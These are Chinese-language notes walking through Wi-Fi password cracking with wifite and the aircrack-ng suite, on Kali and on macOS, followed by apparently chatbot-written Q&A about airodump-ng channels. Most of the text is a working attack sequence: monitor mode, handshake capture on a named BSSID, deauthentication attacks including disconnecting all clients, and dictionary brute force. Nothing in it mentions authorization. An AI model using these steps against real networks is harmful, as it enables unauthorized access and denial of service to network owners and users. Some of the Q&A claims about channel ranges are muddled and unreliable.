sudo -i
切换到root终端,执行wifite
Ctrl+C 停止WIFI列表扫描
这里选择目标1,他会先监听客户端和wifi的连接的数据包,然后用wordlist-probable.txt里面的字典进行报破
区别 WPS 是 no 的和yes
no会自动化报破
这种模式默认下使用的字典是/usr/share/dict/wordlist-probable.txt
和执行如下命令效果一样
aircrack-ng -w /usr/share/dict/wordlist-probable.txt ~/hs/handshake_Adc_12-96-A8-65-BE-A6_2023-05-03T01-03-06.cap
yes
登他跑完后,使用
aircrack-ng -w /usr/share/dict/wordlist-probable.txt ~/hs/xxx.cap
进行爆破或者换更强大的字典
sudo -i
iwconfig
ifconfig
杀死冲突进程
airmon-ng check kill
查看是否识别到网卡
airmon-ng
airmon-ng start wlan0
此时执行iwconfig,可以看到网卡信息发生了变化
airodump-ng wlan0mon
CTRL+Z结束搜索
执行如下命令监听握手包
airodump-ng -c (频道号) --bssid (MAC地址) -w (抓取的数据包的保存位置) wlan0mon
airodump-ng -c 6 --bssid 12:96:A8:65:BE:A6 -w ./1/ wlan0mon
CTRL+C结束
可以看到当前的握手包
打开新终端执行
这里的STATION就是 抓数据包这一步中的STATION信息
aireplay-ng -o 2 -a BSSID(MAC地址)-c STATION wlan0mon
aireplay-ng -0 2 -a 12:96:A8:65:BE:A6 -c F4:30:8B:E6:3A:CA wlan0mon
或
aireplay-ng --deauth 5 -a 12:96:A8:65:BE:A6 -c F4:30:8B:E6:3A:CA wlan0mon
执行后就可以看到原终端抓到的握手包
全部提下线
aireplay -0 0 -a 12:96:A8:65:BE:A6 wlan0mon
以上命令参数
-0表示发起deauthentication攻击
-a指定无线路由器BSSID
-c指定强制断开的设备
aircrack-ng -w /usr/share/dict/wordlist-probable.txt ~/hs/xxx.cap
或者
aircrack-ng -a2 -b 12:96:A8:65:BE:A6 -w /usr/share/wordlists/rockyou.txt 1-01.cap
命令行参数
a2:WPA的握手包
b :破解的WIFI的BSSID
w :指定字典文件
* :.cap是抓取到握手包的数据包文件
字典解压,进入/usr/share/wordlists
gzip -d rockyou.txt.gz
airmon-ng stop wlan0mon
启动网络管理
systemctl start NetworkManager
brew install aircrack-ng
brew install autoconf automake libtool openssl shtool pkg-config hwloc pcre sqlite3 libpcap cmocka
配置环境变量
/System/Library/PrivateFrameworks/Apple80211.framework/Versions/Current/Resources/
执行
sudo airport -s
列出wifi
开始监听
6为目标信道
sudo airport sniff 6
默认会走你当前无线网卡,此时你网卡的状态会断网,变成了监视模式
CTR+C暂停后,使用如下命令爆破
aircrack-ng -w dic.txt /tmp/airportSniff*.cap
发现抓到一个握手包
1 我在使用Airodump-ng扫描wifi列表时,怎么只扫到了channel 14以下的wifi列表
回答
Airodump-ng 可以扫描所有 2.4GHz 频段中的无线网络,包括范围为 1-14 的信道。如果你只扫描到了 channel 14 以下的 Wi-Fi 列表,则有可能是因为以下原因导致:
国家或地区限制:某些国家或地区可能会限制使用高于 channel 13 的 Wi-Fi 信道,因此在这些地区,Wi-Fi 路由器通常只会使用 1-13 之间的信道。如果你所在的地区受到这种限制,那么 Airodump-ng 工具只能扫描到 14 以下的 Wi-Fi 列表。
适配器或驱动程序限制:如果你的 Wi-Fi 适配器或驱动程序不支持扫描高于 channel 14 的 Wi-Fi 信道,那么 Airodump-ng 工具也无法扫描到这些信道。在这种情况下,你可以尝试升级适配器或驱动程序,或者使用其他适配器和驱动程序来解决问题。
需要注意的是,在某些情况下,即使 Airodump-ng 工具扫描不到一个特定的 Wi-Fi 列表,该 Wi-Fi 网络仍然可能存在并且正常运行。如果你确定某个 Wi-Fi 网络存在,但 Airodump-ng 工具无法扫描到该网络,可以尝试使用其他 Wi-Fi 工具来进行扫描和分析。
2 Airodump-ng 支持多少信道的扫描
Airodump-ng 工具支持扫描 2.4GHz 和 5GHz 无线网络的所有信道,具体取决于你的 Wi-Fi 网络适配器和驱动程序的支持情况。
对于 2.4GHz 无线网络,Airodump-ng 可以扫描范围为 1-14 的所有信道。对于 5GHz 无线网络,Airodump-ng 可以扫描包括 DFS(Dynamic Frequency Selection)在内的所有信道,通常是 36-165 范围内的信道。
需要注意的是,不同的国家或地区可能有不同的无线电频谱规定,因此 Airodump-ng 在某些地区可能无法扫描到所有信道。另外,在使用 Airodump-ng 进行 Wi-Fi 嗅探和数据包捕获时,应该遵守相关的法律法规和道德标准,不要侵犯他人隐私权。
3 Airodump-ng 可以扫描到类似于"channel: 52,1"这种信道的BSSID吗?
Airodump-ng 工具可以扫描到类似于 "channel: 52,1" 这种信道的 BSSID。在这种情况下,BSSID 包括了两个频段的信息,分别是 5GHz 的 52 频道和 2.4GHz 的 1 频道。
当 Airodump-ng 工具扫描到这样的 BSSID 时,它会显示当前 Wi-Fi 网络使用的所有频段以及相关的参数,如信号强度、数据传输速率等信息。你可以通过查看这些参数来判断当前 Wi-Fi 网络的性能和状态,并做出相应的优化或调整。
需要注意的是,如果你想要更加深入地了解 Wi-Fi 网络的详细信息,可以结合使用其他工具,如 Wireshark、Kismet 等。这些工具可以提供更加全面和细致的网络数据包捕获和分析功能,以帮助用户更好地理解和优化 Wi-Fi 网络。
4 有没有遇到过同一ESSID对应不同BSSID
是的,在某些情况下,同一ESSID可能会对应不同的BSSID,这通常是由于Wi-Fi网络被配置为使用多个接入点(AP)或使用了Mesh技术导致的。每个AP都有一个唯一的BSSID,但它们共享相同的ESSID,因此客户端设备可以无缝地切换到最强的信号。
在使用Wifite等工具进行Wi-Fi扫描时,由于同一ESSID对应多个BSSID的情况比较常见,工具会尝试列出所有BSSID和其相关信息,并让用户选择连接哪个AP。在选择连接AP时,通常建议选择信号最强的AP,以获得更好的网络体验。
参考:
wifite
https://www.cnblogs.com/obitoma/p/14926022.html
https://blog.csdn.net/qq_38376348/article/details/130472085
aircrack-ng
Wi-Fi deauthentication attacks using aireplay-ng
Kali系统使用Aircrack-ng进行暴力破解WIFI密码 - 简书
简单wifi破解 - 腾讯云开发者社区-腾讯云
mac版本
Mac上使用aircrack-ng破解Wi-Fi密码 – NotAlone, U Are!
macOS上使用aircrack-ng暴力破解Wi-Fi密码_aircrack-ng mac_Kant101的博客-CSDN博客